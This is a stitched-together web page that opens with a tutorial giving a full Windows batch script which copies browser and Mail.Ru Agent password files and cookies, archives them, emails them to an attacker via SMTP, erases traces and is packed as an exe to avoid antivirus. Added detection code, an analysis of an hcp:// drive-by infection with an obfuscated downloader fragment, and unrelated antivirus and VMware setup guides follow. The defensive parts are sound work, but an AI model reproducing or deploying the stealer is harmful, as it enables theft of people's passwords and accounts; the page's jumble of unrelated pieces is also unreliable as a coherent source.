Viruses can steal passwords from your PC. Computer viruses: types and ways of infection. Reminder! We must not forget

In this article I will describe how quickly and without much difficulty, write and make a virus that steals files with passwords and sends it all to the mailbox.
Let's start with the fact that the virus will be written in bat "e (CMD, you can take the basic commands) that is, in the usual text file and will be executed using the standard, built-in Windows interpreter - "command line".
In order to write such a virus, you need to know the exact storage location of those files that it will steal, Blat components that can be downloaded from the off site http://www.blat.net/ or from our server, as well as a component from the WinRaR archiver Rar.exe (you can do without it).
Open notepad and copy the following code into it:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozill a\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\ rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot %\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat. exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls

I won't write much about the code of the batch file itself.
@echo off - hides the body of the batch file (it's not really needed, but still)
md %systemroot%\wincs - creates a wincs folder in the system Windows folder no matter what drive it's installed on or what it's called.
md %SystemDrive%\pass\ - creates a pass folder on the drive where Windows is installed.
md %SystemDrive%\pass\opera\ - creates the opera folder where wand.dat and cookies4.dat from the Opera browser will be copied (up to 11* versions, Opera stores its passwords in the wand.dat file)
md %SystemDrive%\pass\Mozilla\- creates a Mozilla folder where files from the Mozilla browser will be copied (cookies.sqlite ,key3.db ,signons.sqlite ) in which passwords are stored.
md %SystemDrive%\pass\MailAgent\- creates a MailAgent folder into which files containing the history of correspondence and registry keys (storing passwords) from the Mail Agent will be copied.
md %SystemDrive%\pass\MailAgent\reg- creates a folder reg
attrib %systemroot%\wincs +h +s +r- puts attributes on the wincs folder, thereby hiding it from view.
attrib %SystemDrive%\pass +h +s +r- the same as above.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- copies the blat.exe file from the download location to the wincs folder
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- copies the blat.dll file from the download location to the wincs folder
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- copies the blat.lib file from the download location to the wincs folder
CD /D %APPDATA%\Opera\Opera\ - goes to the opera folder where files with passwords (and not only) from the opera are located.
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat- copies the wand.dat file to the opera folder
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- copies the cookies4.dat file to the opera folder
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- exports the magent_logins2 registry key where the password is stored to the reg folder
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- exports the magent_logins3 registry key where the password is stored to the reg folder
CD / D %APPDATA% - go to the AppData folder
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- copies the contents of the Mra\Base folder to the MailAgent folder
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- copies the ver.txt file to the MailAgent folder
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- go to the folder with the Mozilla browser profile
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- copies the cookies.sqlite file to the Mozilla folder
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db- copies key3.db file to Mozilla folder
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- copies the signons.sqlite file to the Mozilla folder
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- copies the WinRar Rar.exe archiver component to the pass folder
del /s /q %SystemRoot%\Rar.exe- removes the archiver component from the Windows folder
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- archive the contents of the pass folder
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar copy the created archive to the wincs folder
cd %systemroot%\wincs - go to the wincs folder
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password - prepares the Blat program for sending the archive, specifying data for authorization and sending a letter. Do not forget to specify your data from mailbox, from where the letter with the archive will be sent.
ren *.rar pass.rar - just in case the archive did not take the wrong name during the process, we will rename it to pass.rar again
%systemroot%\wincs\blat.exe -body Files Password -to [email protected] -attach %systemroot%\wincs\pass.rar- indicate to which postal address the letter will be sent and send it.
rmdir /s /q %SystemDrive%\pass- delete the pass folder
rmdir /s /q %systemroot%\wincs- delete wincs folder
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- remove the Blat components from the Windows folder.
del /s /q %systemroot%\blat.lib- remove the Blat components from the Windows folder.
attrib +a +s +h +r %systemroot%\wind.exe- we put attributes on ourselves, thereby hiding ourselves from the eyes.
EXIT - ends the batch file's process and exits.
cls - clears any output lines in the interpreter.
We copied it, saved it as wind.bat and compiled it into exe using the Bat to exe converter program, then we put everything together, that is, we take the Blat program components and the WinRar archiver component (you can download it) and glue it into one executable file, or with which any program, the path to unload all files must be %SystemRoot% or %WindowsDir% or %windir% .
As a result, we get a virus that will not be fired by antiviruses and will send an archive with files to your mail. The files that come to the mail can be decrypted using multi-password-recovery, though not all, but only wand.dat from the opera and then if it was not updated to 11 * versions. All other files can be decrypted by replacing them with your own.
I think this is the end of it, if you have any questions feel free to ask.
Thank you for your attention, all the best!
©Swap TheHackWorld.in
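Seen from the defender's side, the script above is noisy. `copy`, `md`, `del` and `ren` are cmd.exe built-ins and leave no process-creation record, but `attrib`, `regedit`, `xcopy`, `rar.exe` and `blat.exe` are separate programs and do. The following is an added example, not part of the original article: it matches those command lines and raises an alert only when several preparation steps are followed by a mail send with an attachment on the same host. The rule names, host names, timestamps and sample events are constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns are taken from the commands the article lists. Only external
# programs are covered: built-in copy/md/del never show up as processes,
# so the browser-file copies need file-access auditing instead.
RULES = [
    ("hide_dir_attrib",
     re.compile(r"\battrib(\.exe)?\b(?=.*\+h\b)(?=.*\+s\b)", re.I)),
    ("mail_agent_registry_export",
     re.compile(r"\bregedit(\.exe)?\s+[-/]ea?\s.*\\mail\.ru\\agent\\", re.I)),
    ("mail_agent_history_xcopy",
     re.compile(r"\bxcopy(\.exe)?\s+.*\bmra\\base\b", re.I)),
    ("rar_recursive_archive",
     re.compile(r"\brar(\.exe)?\s+a\s+-r\b", re.I)),
    ("smtp_cli_attachment",
     re.compile(r"\bblat(\.exe)?\s.*-attach\s", re.I)),
]
EXFIL_RULE = "smtp_cli_attachment"


def match_rules(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def correlate(events, window=300, min_prep=2):
    """Alert on a host when a mail send with attachment follows at least
    `min_prep` distinct preparation rules within `window` seconds."""
    by_host = defaultdict(list)
    for ev in events:
        for rule in match_rules(ev["cmdline"]):
            by_host[ev["host"]].append((ev["ts"], rule))
    alerts = {}
    for host, hits in by_host.items():
        for sent_at in (ts for ts, rule in hits if rule == EXFIL_RULE):
            prep = {rule for ts, rule in hits
                    if rule != EXFIL_RULE and 0 <= sent_at - ts <= window}
            if len(prep) >= min_prep:
                alerts[host] = sorted(prep | {EXFIL_RULE})
                break
    return alerts


# Constructed process-creation events (host, epoch seconds, command line).
SAMPLE_EVENTS = [
    {"host": "WS-01", "ts": 1000,
     "cmdline": r"attrib C:\WINDOWS\wincs +h +s +r"},
    {"host": "WS-01", "ts": 1003,
     "cmdline": r'regedit.exe -ea C:\pass\MailAgent\reg\agent.reg '
                r'"HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2"'},
    {"host": "WS-01", "ts": 1004,
     "cmdline": r"xcopy Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E"},
    {"host": "WS-01", "ts": 1010,
     "cmdline": r"C:\pass\rar.exe a -r C:\pass\pass.rar C:\pass"},
    {"host": "WS-01", "ts": 1020,
     "cmdline": r"C:\WINDOWS\wincs\blat.exe -body FilesPassword "
                r"-to user@example.invalid -attach C:\WINDOWS\wincs\pass.rar"},
    # Benign look-alikes: a scheduled report mail and an unrelated xcopy.
    {"host": "WS-02", "ts": 2000,
     "cmdline": r"blat.exe -body nightly -to ops@example.invalid "
                r"-attach D:\reports\backup.log"},
    {"host": "WS-02", "ts": 2050,
     "cmdline": r"xcopy D:\reports E:\archive /S /Y"},
    # Archiving and hiding a folder without any mail send.
    {"host": "WS-03", "ts": 3000,
     "cmdline": r"attrib D:\old +h +s"},
    {"host": "WS-03", "ts": 3005,
     "cmdline": r"rar.exe a -r D:\old.rar D:\old"},
]

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE_EVENTS).items():
        print(host, rules)
```

Requiring both stages keeps a legitimate Blat report job or a lone `attrib +h +s` from alerting on its own.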

Since childhood, I have been tormented by the question: "How does a computer become infected with viruses." Finally I found out, felt for myself. Why not tell the world about how this very entertaining process actually takes place.

So as not to write an infection manual that, God forbid, a lot of people would take advantage of, I will delete some pieces of the scripts.

Everyone is probably fed up with the phrases about the "leakiness" of MS Windows, but, nevertheless, it remains the most common system on planet Earth. Or maybe the system is so full of holes because of its prevalence.

And now, the attack was carried out on one of the vulnerabilities of the Windows XP system, namely the Windows Help Center.

The beginning, as usual, was a long time ago (already in 2010), you can read about this on the very well-known resource xakep.ru (at the very bottom of the page).

It all started simply.

IE issued a request to open a program from the tjyre.info resource. Clearly a virus! But it's interesting!!

Going to the site http://tjyre.info gives no information, except that the site is under development (at the time of writing this post it simply doesn't work; apparently they broke it).

How do I find out what was meant for me on the computer? Elementary - you need to consider where the link leads.

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A% %A ... %%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=

As my ignorance tells me, the link to the virus file is hidden behind the numbers.

Through simple transformations, it turns out that a script with the file name l.vbs is copied to my computer's system folder and then executed.

The address where the script is located on the network:


http://tjyre.info/games/hcp_vbs.php?f=17

The file that opens contains the following text:

« w=3000:x=200:y=1:z=false:a = " http://tjyre.info/u.php?e=7&f=17":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):Set f=e.GetSpecialFolder(2):b = f & "\exe.ex2":b=Replace(b,Month("2010-02 -16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) … Removed for stupid reasons...g =o.GetFile(b ):g.Delete»

The text is quite simple:

    we see the date 02/16/2010 (it turns out that the virus is being masked by date in some way; evidently they did decide that masking is necessary)

    we see commands written backwards (using a reverse function), with the help of which the virus file arrives on our computer.
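The two tricks in the quoted fragment can be undone statically, without running the script. The following added example (not part of the original post) folds `StrReverse("...")` and `Month("...")` calls on string literals and reports the COM objects, URL, folder and file name that result. `Month("2010-02-16")` evaluates to 2, so the `Replace` call turns `exe.ex2` into `exe.exe`. The sample text is constructed from the visible part of the fragment with the URL replaced by a placeholder, and the function names are this example's own.

```python
import re

# FileSystemObject.GetSpecialFolder constants.
SPECIAL_FOLDERS = {0: "WindowsFolder", 1: "SystemFolder", 2: "TemporaryFolder"}

# Constructed sample modelled on the fragment quoted above. The URL is a
# placeholder and the part the author removed is left out. The text is only
# parsed here, never executed.
SAMPLE = ('w=3000:x=200:y=1:z=false:a = " http://example.invalid/u.php":'
          'Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):'
          'Set f=e.GetSpecialFolder(2):b = f & "\\exe.ex2":'
          'b=Replace(b,Month("2010-02-16"),"e"):OT = "GET":'
          'Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):'
          'Set d = CreateObject(StrReverse("maertS.BDODA"))')


def fold_constants(src):
    """Evaluate StrReverse("...") and Month("YYYY-MM-DD") on literals."""
    src = re.sub(r'StrReverse\(\s*"([^"]*)"\s*\)',
                 lambda m: '"%s"' % m.group(1)[::-1], src, flags=re.I)
    src = re.sub(r'Month\(\s*"\d{4}-(\d{2})-\d{2}"\s*\)',
                 lambda m: str(int(m.group(1))), src, flags=re.I)
    return src


def analyse(src):
    """Return the indicators visible once the constants are folded."""
    folded = fold_constants(src)
    report = {
        "prog_ids": re.findall(r'CreateObject\(\s*"([^"]+)"\s*\)',
                               folded, flags=re.I),
        "urls": re.findall(r'"\s*(https?://[^"\s]+)"', folded, flags=re.I),
        "special_folders": [
            SPECIAL_FOLDERS.get(int(n), n)
            for n in re.findall(r'GetSpecialFolder\(\s*(\d+)\s*\)',
                                folded, flags=re.I)],
        "file_names": [],
    }
    # Pattern: var = <expr> & "literal", later var = Replace(var, x, "y").
    # The replacement is applied to the literal part only; at run time it
    # would also touch the folder path in front of it.
    for var, literal in re.findall(r'\b(\w+)\s*=\s*\w+\s*&\s*"([^"]*)"',
                                   folded):
        rx = (r'\b%s\s*=\s*Replace\(\s*%s\s*,\s*"?([^",)]+)"?\s*,'
              r'\s*"([^"]*)"\s*\)' % (re.escape(var), re.escape(var)))
        for find, repl in re.findall(rx, folded, flags=re.I):
            literal = literal.replace(find, repl)
        report["file_names"].append(literal)
    return report


if __name__ == "__main__":
    for key, value in analyse(SAMPLE).items():
        print(key, value)
```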

A fresh readme.exe lands safely. What does this guest bring us? Probably a lot of fun.

The launch of readme.exe was very successfully blocked by the antiwinlocker program, for which it deserves honor and praise. But since I still want to see what happens, the defenders will have to be asked to step aside for a while.

The first launch of the virus was not remarkable, which is understandable, the virus penetrated and hid until the next boot.

We reboot and again silence. Mystery!!

We'll have to look in secret corners.

We find in the folder "C:\Documents and Settings\Admin\Application Data" the file lsass.exe (simulating the system process).

In the registry, respectively, we find the key:

"userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe" as expected.

But that's not all!

In the folder "C:\WINDOWS\system32\drivers\etc" there is a magic hosts file, to which the virus adds about a dozen magic lines (please view the ENTIRE hosts file):

These lines are used to redirect the Odnoklassniki and vkontakte sites to a very specific site, and also to completely block Kaspersky updates (the virus is similar to Trojan.Win32.Ddox.ci).
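Both persistence traces described above, the extra entry in the "userinit" value and the added hosts lines, can be checked mechanically. This is an added example, not part of the original post: the watch list of domains and the hosts content are constructed for illustration (documentation-range IP addresses), and the function names are this example's own.

```python
# Process names that malware likes to borrow; legitimate copies live in
# <system root>\system32.
SYSTEM_NAMES = {"lsass.exe", "svchost.exe", "csrss.exe", "winlogon.exe",
                "services.exe", "userinit.exe"}
# Assumed watch list for this example: the sites the post names.
WATCHED = ("odnoklassniki.ru", "vkontakte.ru", "kaspersky.com")


def _norm(path):
    # .reg exports double every backslash; collapse them and lower-case.
    return path.strip().strip('"').replace("\\\\", "\\").lower()


def audit_userinit(value, system_root=r"C:\WINDOWS"):
    """Return every entry of the Userinit value other than userinit.exe."""
    expected = _norm(system_root + r"\system32\userinit.exe")
    sys32 = _norm(system_root + r"\system32") + "\\"
    findings = []
    for entry in value.split(","):
        path = _norm(entry)
        if not path or path == expected:   # default value ends with ","
            continue
        name = path.rsplit("\\", 1)[-1]
        findings.append({
            "path": path,
            "masquerades_system_process":
                name in SYSTEM_NAMES and not path.startswith(sys32),
        })
    return findings


def audit_hosts(text, watched=WATCHED):
    """Return (line number, ip, host) for every mapping of a watched domain.
    Blank lines are skipped, so entries pushed far down the file by empty
    padding are found as well."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        ip, names = fields[0], fields[1:]
        for name in names:
            host = name.lower().rstrip(".")
            if any(host == d or host.endswith("." + d) for d in watched):
                findings.append((line_no, ip, host))
    return findings


# The Userinit value as quoted in the post (registry-export form).
SAMPLE_USERINIT = (r"C:\\WINDOWS\\system32\\userinit.exe,"
                   r"C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe")

# Constructed hosts file: normal header, 40 empty lines, then added entries.
SAMPLE_HOSTS = (
    "# Copyright (c) 1993-1999 Microsoft Corp.\n"
    "127.0.0.1       localhost\n"
    + "\n" * 40 +
    "203.0.113.7 odnoklassniki.ru www.odnoklassniki.ru\n"
    "203.0.113.7 vkontakte.ru\n"
    "127.0.0.1   www.kaspersky.com\n"
)

if __name__ == "__main__":
    print(audit_userinit(SAMPLE_USERINIT))
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```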

What do we see when we go to the villain's website? We see the Odnoklassniki home page, but if you enter a username and password, they will go straight to the "villain". And if you click on some link, you get a very cool request for "account validation". And the text clearly states: "The service is not available to subscribers in some regions of MegaFon". Such a serious approach to business that I did not immediately grasp the meaning of the phrase.

In order not to become a victim, you need to keep the Internet safe and direct the necessary efforts to protect your computer!

In this article, or rather these instructions, I, Vladimir Belev (formerly an employee of the Moscow Instrument-Making College as a technician, engineer and teacher), will tell you about 3 simple options an ordinary user has for protecting a computer, and will answer all your questions, as far as possible, in the comments at the end of the article.

When you know where to lay the feather bed, it is better to lay it!


Introduction

When surfing the Internet from a computer, you may encounter such phenomena as computer infection with various malicious programs, which can lead to completely different consequences, from file damage and disruption of the normal, stable operation of the operating system to complete system failure and even theft of important personal data!

Moreover, besides direct infection of the computer, you can simply become a victim of scammers who can steal your very important data, such as logins and passwords from various sites, as well as information about your bank cards and any other information whose loss may result in money suddenly being debited from your accounts.

Therefore, when working on the Internet, you need to be, firstly, extremely careful, try not to visit suspicious and dangerous sites, and also apply protection tools for your computer.

Below I will show and tell you what options you have to protect yourself from different kinds of threats while browsing the Internet from your computer…

Option number 1. Apply simple antivirus protection (when using Windows)

This is perhaps the most relevant, simple and common method of protecting your computer from various threats on the Internet. Some configurations of anti-virus products also have in their arsenal protection of your personal data and additional protection when making payments online.

Antiviruses, as well as various antispyware, antitrojans and other utilities from the same category, can be paid or free and, of course, they are developed by different manufacturers. I have tried both first-hand, and with growing experience, practice and various experiments I came to the unequivocal conclusion that free antiviruses can fully provide decent protection for your computer.

And when to choose a paid and when a free antivirus? My answer is that it's easier to use free ones.

Paid antiviruses differ for the most part only in the presence of a large amount of additional functionality, for example, a secure storage for passwords, a built-in program for cleaning the computer, a browser, or a tool for updating the software installed on the computer. Additional protection elements can also be built in, such as a firewall, which protects your computer from various hacker attacks and, in general, allows you to block access to the Internet for certain programs and according to certain rules.

But all this, if required, can be found separately in free options, and I think there is simply no need to pay for it.

To date, I have settled on the free Avast antivirus, which I have been using for more than 4 years in a row.

During these 4 years, I have never picked up any serious infection from the Internet, which would even lead to petty problems in the operation of my system and the programs installed on it. Of course, all this is not without taking into account such a simple thing as a generally careful “walk” through the sites, without clicking on links in suspicious emails, without entering various data on suspicious and untrusted sites, in general, without visiting sites that do not at all inspire trust!

Below I will show you how to install and configure the free version of Avast antivirus to work with a high degree of protection.

Modern versions of Windows already include standard protection against viruses, called “Windows Defender”; however, for greater security, especially for novice users, I would still recommend using a third-party antivirus (when you install it, the standard protection will turn itself off).

Installing an antivirus

You can download the antivirus from the official website at the link:

On the page, click the “Download free antivirus” button (it may be called a little differently).

If this does not happen, you may be redirected to another page where you will need to confirm the download or select the version of the antivirus (free or paid).

Run the downloaded file to start the installation.

Do not immediately click the install button, but click “Settings”!

Now you need to select the antivirus components that will be installed.

In the image below, circled in yellow are the most important and mandatory components of the antivirus that will directly protect your computer (check files on your computer, files downloaded from the Internet, mail, and analyze behavior in the system for suspicious actions in real time). Don't uncheck these boxes!

Everything else can be set as in the same image above. I would recommend just such a set of components, because some of the rest are useless, and the others will not work in the free version of the antivirus. Or you can disable something that you consider unnecessary for yourself.

You can read what component is used for what by hovering the mouse over the question mark next to the desired component.

Click "Install".

After the installation is completed, click “Continue” several times in different windows.

In the last window after installation, you will be prompted to install the antivirus on your Android smartphone or tablet. You can always do this directly from the device itself, or you can install it right away, through this window.

To opt out, click "No, I don't want to" below.

Remember that any antivirus, especially on a smartphone, is an additional load on it (it may start to slow down the device), and the battery also drains faster! From my experience, I'll say that it's not so easy to catch a virus on Android, much more difficult than on Windows, if you don't visit dangerous sites; in all the time I have used smartphones with Android OS, I have never had an infection that led to a breakdown or instability of the device.

This completes the installation!

Free License Activation

After installing the antivirus, it is better to immediately activate your free license, because after 30 days the antivirus may start signaling you about the expiration date. Annoying warnings will appear and soon the antivirus may turn off altogether. However, activation is a matter of minutes and a subscription is given immediately for a year, after which it can be extended again for a year and so on ad infinitum.

Open the main window of the antivirus and click "Activate".

Click "Select" under the column "Avast Free Antivirus” (free protection).

In the next window, decline to install the trial version of the paid protection:

That's all there is to activation. If the activation period is about to expire, the program will warn you and you will just need to repeat the procedure.

Antivirus settings

In order for the antivirus to reliably do its job, as well as to disable various unnecessary “chips”, I recommend making some settings.

Open "Settings" from the main window of the antivirus.

Program settings

This is to prevent possible “smart” malware from starting to disable your antivirus or manage its settings on its own.

Go to the "Password" subsection, enable the "Protect Avast with a password" function and set any password. Even the simplest will do. And you can set the settings for protected areas directly as in the image below:

Security settings

Open the “Components” tab and here you can configure each protection component separately.

The settings that are set initially can be left as they are, with them the antivirus does not “load” the system much and at the same time protects well. I recommend changing only the sensitivity level by setting it to “High” (initially it is “normal”). To do this, open the settings of each component one by one and in the “Sensitivity” tab, set “High”. Don't forget to save your changes!



Scanning for viruses

No matter how good the antivirus is and no matter how correctly it is configured, there is always a chance to miss something on the computer. Therefore, you need to regularly (once a month, for example) run a full scan of your computer for threats to keep your system in good condition and more secure.

To scan your computer with Avast antivirus, go to the "Protection" section and select "Antivirus".

Before running a full computer scan, I recommend that you configure this type of scan a bit. To do this, click on the gear in the corner of the block with this type of scan.

In the “Scanning” - “File types” section, check the “Scan all files” checkbox so that the scan is as thorough as possible (but will take longer).

In the “Sensitivity” section, set the sensitivity to high and enable the “Scan entire files” option.

In the "Archivers" section, check "All archivers".

Option number 2. Work fully or partially through a virtual machine (when using Windows)

This protection method is as follows. A special program is installed on your computer, through which you install a new operating system (whatever you want) and can work in it while being in your real system.

This operating system, which runs for you through the special program, is the virtual machine, i.e. a virtual computer.

What does it give? A virtual machine is a separate environment from your real system, and if viruses get there, they will remain there without causing any harm to your real system.

A virtual machine requires good performance from your computer. Simply put, the computer must be powerful! Of course, a lot also depends on the system that you will install as a virtual machine, because, for example, Windows XP requires several times less computer resources than modern Windows 10. If the computer is weak, not only will you not be able to work normally in a virtual machine, but your real system may also slow down and not cope with some routine tasks.

What kind of computer do you need to have to work with a virtual machine? Sometimes it's easier to just try it and see, i.e. install a virtual machine, allocate the required amount of RAM for it and see whether working in it is normal or uncomfortable. It is better to have a processor from the Core i line or a similar one from AMD, and RAM from 4 GB, because even the already old Windows 7 requires 2 GB of memory for normal operation. Accordingly, if you have less than 4 GB of RAM in total on your computer, you can forget about the virtual machine.

Based on the above, you can use a virtual machine in 2 options:

    Perform most of your actions in it, i.e. “walk” on the Internet, download something.

    Perform only certain actions in the virtual machine, for example, visit sites that you are not sure about, download files that you are not sure about, or install all sorts of unknown programs.

I would not use the first method, since it is simply inconvenient to spend most of the time in a virtual machine. And secondly, for comfortable work in a virtual machine (just like in a regular system), you need a very powerful computer, and this is without taking into account the fact that some tasks can be performed in parallel in the real system.

Installing VMware Workstation Player to create and work with virtual machines

The VMware Workstation Player software for working with virtual machines will only run on computers with a 64-bit version of Windows! Nowadays, in the vast majority of cases, this is the version of Windows installed on computers. In any case, you can just try to install it.

You can download the program from the official website by clicking on the link:

On the page that opens, click the “Download” button next to the version for Windows (for Windows 64-bit Operating Systems) and the program will be downloaded to your computer.

After the installation file has downloaded, run it.

In the first installation window, click Next.

At one of the installation steps, check the box “Enhanced Keyboard Driver” and click “Next”:

Enabling this option means that the extended keyboard driver will be installed for virtual machines and it is better to install it just in case.

In one of the installation windows, uncheck the "Help Improve VMWare Workstation 12 Player" option, and leave the first option enabled:

The first option means that the program will automatically check for updates, and if there is a new version, you can immediately upgrade to it. The second option is to help the developers of the program by sending anonymous information about the operation of this program from your computer.

That's it, the installation is complete.

Now run the program and you will see the following window:

Here you need to select the first item, as in the image above and enter your E-Mail address. This is only necessary so that you can use the program for free. After entering your E-Mail, click "Continue".

In the next window, click "Finish":

The program window will open.

Create a virtual machine

Now in the main window of the program, click "Create a New Virtual Machine" to create a new virtual machine:

So we have reached the stage where you need to choose from where, from which file or disk the operating system will be installed as a virtual one. There will be 2 options in the window: install from a CD / DVD disc (Installer disc) or install from an image file stored on your computer (Installer disc image file). Choose the first option if you have your own CD / DVD disk with an OS that you want to install as a virtual one:

For example, you have a disk with Windows 7 and want to install this system as a virtual one. Then insert the disk with this system into the computer and choose the first option.

But operating systems for installation can also be stored in a special file on your computer, called an "image". Then you can install the operating system as a virtual machine directly from this file. Here is an example of an image file of the Windows XP operating system:

VMWare Workstation Player supports ".ISO" image files, so if you have an iso image with the operating system, then it is easiest to install a virtual machine from it. And then choose the second option in the current window:

Using the "Browse" button, you can select just the desired image file with the operating system.

After choosing the option you want, click the "Next" button below.

Any operating system can be installed as a virtual one; any Windows system, any Linux or any other!

I recommend installing Windows 7, because, for example, the oldest Windows XP is no longer supported and many programs may not work correctly in it, and many will not work at all. And newer ones (Windows 8 and 10) require more performance from your computer to work properly.

In the next window, we are prompted to specify in advance the key for installing the operating system, specify the username and password:

After all, installing an operating system in a virtual machine will be no different from installing a real OS on your computer. The only difference is that the system will be installed in the window virtually, and not on your real HDD. But in that window, I recommend leaving only the username, which is likely to be set automatically (taken from your real OS). The key and other parameters, if necessary, are easier to specify already during the installation of the OS. Therefore, in that window, just click "Next" to continue.

You will probably see a warning window that you didn't specify a key. Click "Yes":

In the next window, in the first field, you need to specify the name of the virtual machine that you are creating, and in the second field, the location of the virtual machine files on your computer.

You can call it whatever you like; usually it is given the name of the OS that you will install. The main thing is that you yourself understand which OS is where, if you later install and work with several virtual OSes. I.e., don't call it something like “1234”, because then you yourself won't understand what kind of virtual machine is behind that name until you start it.

You can choose any location for the virtual machine on your computer, i.e. any folder or drive in your real system. It is in the selected folder that the files (there will be many) that are responsible for starting the virtual machine will be located.

Please note that the virtual machine will take up a lot of space! Depends on the system being installed.

When you specify the name and location, click "Next".

In the next window, you need to specify the volume of your hard drive, which will be allocated for the work of the created virtual machine. This is a very important step!

As I said, a virtual machine is practically no different from your real OS. It will also have its own hard drive, only a virtual one.

And the volume of the hard disk of the virtual OS will be equal to the volume of your real hard disk that you allocate for the virtual machine.

Everything here will depend on which operating system you install as a virtual one. If, for example, Windows XP, then it does not require a lot of hard disk space and about 10-15 GB is enough for it.

But modern Windows OSes (7, 8, 10) require a decent amount of free disk space for their work: at least 30 GB, and preferably more (depending on what the virtual machine will be used for).

And in the first field of the current window, you need to specify how much of your real hard disk you will allocate for the created virtual machine.

As I already said, for the example I will install a 30-day trial version of Windows XP. For this system, a virtual disk size of 15 GB will be enough.

Please note that your real hard drive should have at least as much free space as you allocate for the virtual machine!

By checking that option, we indicated that it is not necessary to divide the virtual hard disk on which the virtual OS will run into several files; let it be in one file. If we chose the second option "Split virtual disk into multiple files", then the virtual hard disk would be divided into several files.

In the next window, you will receive information about the settings of the created virtual machine. We can click “Finish” right now to start the installation of the virtual machine, but we will not do this now.

Let's move on to the additional settings of the virtual machine to understand another extremely important setting; to do this, click the "Customize Hardware" button:

An additional window will open with settings on several tabs. We are only interested in the “Memory” tab, which sets the amount of RAM allocated to the virtual machine on your computer.

In this window, you need to specify the amount of your real RAM that will be allocated for the operation of the virtual machine.

Everything again depends on what operating system you will install. If this is Windows XP, then it will be able to work with only 128 MB of memory, though it will slow down a lot.

It is better to allocate 1-2 GB of RAM to it. If you install Windows 7, 8 or 10 as a virtual machine, then I recommend allocating at least 2 GB of RAM.

But there is one more point. If your computer already has little RAM, then you cannot allocate much for the virtual system!

If the computer has only 2 GB of memory (such a computer is very weak today), then you are unlikely to allocate more than 512 MB (megabytes) of memory for the virtual machine, because if you allocate more, your main system may start to slow down hard. Consider this!

